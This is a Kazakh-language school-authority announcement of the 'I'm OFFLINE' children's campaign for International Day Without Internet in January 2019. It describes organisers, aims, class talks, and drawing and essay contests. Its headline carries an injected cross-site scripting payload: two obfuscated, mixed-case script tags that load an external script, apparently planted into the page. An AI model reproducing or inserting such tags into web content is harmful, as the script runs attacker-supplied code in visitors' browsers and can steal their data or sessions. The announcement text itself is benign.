Халықаралық интернетсіз күніне арналған «Мен OFFLINE (оффлайн)» республикалық кең ауқымды балалар акциясының<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.01.2019

Өткізу уақыты:

       2019жылғы 27 қаңтар

       Акция ұйымдастырушылары:

ҚР Білім және ғылым министрлігі Балалардың құқықтарын қорғау комитеті, облыстардың, Астана, Алматы және Шымкент қалаларының білім басқармалары, бұқаралық ақпарат құралдары.

Акция мақсаты: - интернетке  тәуелділіктің алдын алу, кәмелетке толмағандардың Интернет белсенділігін бақылауға қатысты ересек интернет-қызметтерді пайдаланушылардың жауапкершілігін Интернет-пайдалану мәдениетін арттыру.

Акция бірқатар іс-шаралар өткізіледі:

 

         І. Дайындық кезеңі:

 

1. Акцияны өткізудің дайындығы мен өткен шаралар туралы ақпараттарды Қазақстан Республикасы Білім және ғылым министрлігінің, Балалардың құқықтарын қорғау комитетінің және білім беру ұйымдарының, органдардың, сондай-ақ басқа да интернет-ресурстарға, бұқаралық ақпарат құралдарына жариялап отыру.

2. Акцияны өткізу барысы туралы шараларды бұқаралық ақпарат құралдарында жариялап отыру.

 

ІІ. Негізгі кезең:

 

- оқушылар мен ата-аналарға интернетсіз халықаралық күн туралы                  2019 жылғы 27 қаңтарға дейін сынып сағаттарын, әңгімелесуді ұйымдастыру.                     2018 жылғы 27 қаңтар күнін - «Мен OFFLINE (оффлайн)» атты республикалық кең ауқымды балалар акциясы деп жариялау;

- 1-4 сынып оқушыларына арналған «Мен интернетсіз күнді қалай өткіздім?» атты сурет байқауын;

- 5-11 сынып оқушыларына арналған «Мен OFFLINE (оффлайн)» эссэ байқауын ұйымдастыру қажет.

Ағымдағы жылғы 1 ақпанға дейінгі мерзімде іс-шаралар туралы қорытынды ақпаратты ұсыну, оқушылардың жұмыстарын Балалардың құқықтарын қорғау комитетінің Facebook әлеуметтік желісіндегі ресми парақшасында орналастыру (https://www.facebook.com/balaqqk.gov.kz/).

Просмотров: 748


Пікір қосу



Деректерді қолтаңбаға қосу